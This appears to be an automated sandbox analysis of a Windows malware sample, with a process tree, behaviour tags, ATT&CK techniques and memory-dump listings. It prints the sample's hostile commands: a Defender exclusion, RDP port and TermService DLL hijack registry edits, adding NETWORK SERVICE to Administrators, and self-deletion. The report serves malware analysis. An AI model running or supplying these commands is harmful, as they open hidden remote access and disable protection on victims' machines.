PID 3040 wrote to memory of 3508	3040	Process not Found	87
PID 3040 wrote to memory of 3508	3040	Process not Found	87
PID 1552 wrote to memory of 3660	1552	msiexec.exe	88
PID 1552 wrote to memory of 3660	1552	msiexec.exe	88
PID 1552 wrote to memory of 3660	1552	msiexec.exe	88
PID 2392 wrote to memory of 2900	2392	13C9.exe	89
PID 2392 wrote to memory of 2900	2392	13C9.exe	89
PID 2392 wrote to memory of 2900	2392	13C9.exe	89
PID 2360 wrote to memory of 2908	2360	powershell.exe	90
PID 2360 wrote to memory of 2908	2360	powershell.exe	90
PID 2360 wrote to memory of 2908	2360	powershell.exe	90
PID 2908 wrote to memory of 2752	2908	csc.exe	91
PID 2908 wrote to memory of 2752	2908	csc.exe	91
PID 2908 wrote to memory of 2752	2908	csc.exe	91
PID 1552 wrote to memory of 2860	1552	msiexec.exe	92
PID 1552 wrote to memory of 2860	1552	msiexec.exe	92
PID 1552 wrote to memory of 2860	1552	msiexec.exe	92
PID 2360 wrote to memory of 4292	2360	powershell.exe	93
PID 2360 wrote to memory of 4292	2360	powershell.exe	93
PID 2360 wrote to memory of 4292	2360	powershell.exe	93
PID 1552 wrote to memory of 4552	1552	msiexec.exe	95
PID 1552 wrote to memory of 4552	1552	msiexec.exe	95

C:\Users\Admin\AppData\Local\Temp\f8c9d11a8316183bc3c137f9e1d452c7.exe
"C:\Users\Admin\AppData\Local\Temp\f8c9d11a8316183bc3c137f9e1d452c7.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Users\Admin\AppData\Local\Temp\f8c9d11a8316183bc3c137f9e1d452c7.exe
  "C:\Users\Admin\AppData\Local\Temp\f8c9d11a8316183bc3c137f9e1d452c7.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2844

C:\Users\Admin\AppData\Local\Temp\F831.exe
C:\Users\Admin\AppData\Local\Temp\F831.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hcchis5z\hcchis5z.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C60.tmp" "c:\Users\Admin\AppData\Local\Temp\hcchis5z\CSC324DF17B7D51471D8A17B1F4F4E46C8.TMP"
      4⤵
      PID:2752
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:2692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:2380
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    PID:3548
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start rdpdr
      4⤵
      PID:3248
    - - C:\Windows\SysWOW64\net.exe
        
        net start rdpdr
        5⤵
        
        PID:4056
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:4180
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:4168
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:4292
    - - C:\Windows\SysWOW64\net.exe
        
        net start TermService
        5⤵
        
        PID:5068
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4244
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3156

C:\Users\Admin\AppData\Local\Temp\FB7E.exe
C:\Users\Admin\AppData\Local\Temp\FB7E.exe
1⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Users\Admin\AppData\Local\Temp\8d48157d-aa2a-4fd9-8d79-259495533ba8\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\8d48157d-aa2a-4fd9-8d79-259495533ba8\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8d48157d-aa2a-4fd9-8d79-259495533ba8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3428
- - C:\Users\Admin\AppData\Local\Temp\8d48157d-aa2a-4fd9-8d79-259495533ba8\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\8d48157d-aa2a-4fd9-8d79-259495533ba8\AdvancedRun.exe" /SpecialRun 4101d8 3428
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3556
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\FB7E.exe" -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3952
- C:\Users\Admin\AppData\Local\Temp\FB7E.exe
  "C:\Users\Admin\AppData\Local\Temp\FB7E.exe"
  2⤵
  - Executes dropped EXE
  PID:3660
- C:\Users\Admin\AppData\Local\Temp\FB7E.exe
  "C:\Users\Admin\AppData\Local\Temp\FB7E.exe"
  2⤵
  - Executes dropped EXE
  PID:3748
- C:\Users\Admin\AppData\Local\Temp\FB7E.exe
  "C:\Users\Admin\AppData\Local\Temp\FB7E.exe"
  2⤵
  - Executes dropped EXE
  PID:3996

C:\Users\Admin\AppData\Local\Temp\13C9.exe
C:\Users\Admin\AppData\Local\Temp\13C9.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\13C9.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632885205 " AI_EUIMSI=""
  2⤵
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
  PID:2900

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 75BFF344F2002A54A2CE62AA4EC51AEE C
  2⤵
  - Loads dropped DLL
  PID:3660
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding EF6EC7FB3906C86C6CD118178943804F
  2⤵
  - Loads dropped DLL
  PID:2860
- C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe
  "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Loads dropped DLL
  PID:4552

C:\Users\Admin\AppData\Local\Temp\1F82.exe
C:\Users\Admin\AppData\Local\Temp\1F82.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3508
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1F82.exe"
  2⤵
  PID:4020
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:4648

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/600-826-0x000000007F010000-0x000000007F011000-memory.dmp

Filesize
4KB

Download
memory/600-800-0x00000000073D0000-0x00000000073D1000-memory.dmp

Filesize
4KB

Download
memory/600-801-0x00000000073D2000-0x00000000073D3000-memory.dmp

Filesize
4KB

Download
memory/2276-117-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/2360-185-0x00000000045D2000-0x00000000045D3000-memory.dmp

Filesize
4KB

Download
memory/2360-299-0x00000000045D3000-0x00000000045D4000-memory.dmp

Filesize
4KB

Download
memory/2360-364-0x0000000008C60000-0x0000000008C61000-memory.dmp

Filesize
4KB

Download
memory/2360-226-0x0000000009250000-0x0000000009251000-memory.dmp

Filesize
4KB

Download
memory/2360-184-0x00000000045D0000-0x00000000045D1000-memory.dmp

Filesize
4KB

Download
memory/2360-228-0x0000000008970000-0x0000000008971000-memory.dmp

Filesize
4KB

Download
memory/2360-262-0x00000000067B0000-0x00000000067B1000-memory.dmp

Filesize
4KB

Download
memory/2360-1488-0x000000007ECE0000-0x000000007ECE1000-memory.dmp

Filesize
4KB

Download
memory/2756-147-0x0000000005A64000-0x0000000005A65000-memory.dmp

Filesize
4KB

Download
memory/2756-144-0x0000000008650000-0x0000000008651000-memory.dmp

Filesize
4KB

Download
memory/2756-146-0x0000000005A63000-0x0000000005A64000-memory.dmp

Filesize
4KB

Download
memory/2756-145-0x0000000005A62000-0x0000000005A63000-memory.dmp

Filesize
4KB

Download
memory/2756-143-0x0000000005A60000-0x0000000005A61000-memory.dmp

Filesize
4KB

Download
memory/2756-142-0x0000000000400000-0x0000000000C64000-memory.dmp

Filesize
8.4MB

Download
memory/2756-141-0x0000000001650000-0x0000000001A52000-memory.dmp

Filesize
4.0MB

Download
memory/2756-140-0x00000000068A0000-0x00000000068A1000-memory.dmp

Filesize
4KB

Download
memory/2756-139-0x0000000003540000-0x0000000003541000-memory.dmp

Filesize
4KB

Download
memory/2756-136-0x0000000005E80000-0x000000000627F000-memory.dmp

Filesize
4.0MB

Download
memory/2788-128-0x00000000054C0000-0x00000000054C1000-memory.dmp

Filesize
4KB

Download
memory/2788-129-0x0000000005420000-0x0000000005499000-memory.dmp

Filesize
484KB

Download
memory/2788-130-0x0000000005A60000-0x0000000005A61000-memory.dmp

Filesize
4KB

Download
memory/2788-125-0x0000000000010000-0x0000000000011000-memory.dmp

Filesize
4KB

Download
memory/2788-127-0x0000000004990000-0x0000000004991000-memory.dmp

Filesize
4KB

Download
memory/2844-115-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3040-118-0x0000000000D30000-0x0000000000D46000-memory.dmp

Filesize
88KB

Download
memory/3508-323-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/3508-322-0x0000000002110000-0x00000000021A0000-memory.dmp

Filesize
576KB

Download
memory/3952-178-0x00000000078A0000-0x00000000078A1000-memory.dmp

Filesize
4KB

Download
memory/3952-214-0x00000000090C0000-0x00000000090F3000-memory.dmp

Filesize
204KB

Download
memory/3952-216-0x000000007E2E0000-0x000000007E2E1000-memory.dmp

Filesize
4KB

Download
memory/3952-164-0x0000000004732000-0x0000000004733000-memory.dmp

Filesize
4KB

Download
memory/3952-166-0x0000000006F40000-0x0000000006F41000-memory.dmp

Filesize
4KB

Download
memory/3952-252-0x0000000004733000-0x0000000004734000-memory.dmp

Filesize
4KB

Download
memory/3952-163-0x0000000004730000-0x0000000004731000-memory.dmp

Filesize
4KB

Download
memory/3952-239-0x00000000093E0000-0x00000000093E1000-memory.dmp

Filesize
4KB

Download
memory/3952-227-0x0000000008E90000-0x0000000008E91000-memory.dmp

Filesize
4KB

Download
memory/3952-189-0x00000000081D0000-0x00000000081D1000-memory.dmp

Filesize
4KB

Download
memory/3952-167-0x0000000006FE0000-0x0000000006FE1000-memory.dmp

Filesize
4KB

Download
memory/3952-156-0x00000000045F0000-0x00000000045F1000-memory.dmp

Filesize
4KB

Download
memory/3952-172-0x0000000007B20000-0x0000000007B21000-memory.dmp

Filesize
4KB

Download
memory/3952-237-0x00000000091F0000-0x00000000091F1000-memory.dmp

Filesize
4KB

Download
memory/3952-157-0x0000000007120000-0x0000000007121000-memory.dmp

Filesize
4KB

Download
memory/3996-160-0x00000000058D0000-0x00000000058D1000-memory.dmp

Filesize
4KB

Download
memory/3996-162-0x0000000005490000-0x0000000005491000-memory.dmp

Filesize
4KB

Download
memory/3996-161-0x0000000005360000-0x0000000005361000-memory.dmp

Filesize
4KB

Download
memory/3996-361-0x00000000072A0000-0x00000000072A1000-memory.dmp

Filesize
4KB

Download
memory/3996-320-0x0000000007350000-0x0000000007351000-memory.dmp

Filesize
4KB

Download
memory/3996-318-0x0000000006C50000-0x0000000006C51000-memory.dmp

Filesize
4KB

Download
memory/3996-181-0x00000000052C0000-0x00000000058C6000-memory.dmp

Filesize
6.0MB

Download
memory/3996-151-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3996-169-0x0000000005400000-0x0000000005401000-memory.dmp

Filesize
4KB

Download
memory/3996-165-0x00000000053C0000-0x00000000053C1000-memory.dmp

Filesize
4KB

Download
memory/4292-568-0x000000007E9D0000-0x000000007E9D1000-memory.dmp

Filesize
4KB

Download
memory/4292-398-0x0000000006B32000-0x0000000006B33000-memory.dmp

Filesize
4KB

Download
memory/4292-396-0x0000000006B30000-0x0000000006B31000-memory.dmp

Filesize
4KB

Download
memory/5084-1125-0x000000007F2C0000-0x000000007F2C1000-memory.dmp

Filesize
4KB

Download
memory/5084-1056-0x00000000073C2000-0x00000000073C3000-memory.dmp

Filesize
4KB

Download
memory/5084-1055-0x00000000073C0000-0x00000000073C1000-memory.dmp

Filesize
4KB

Download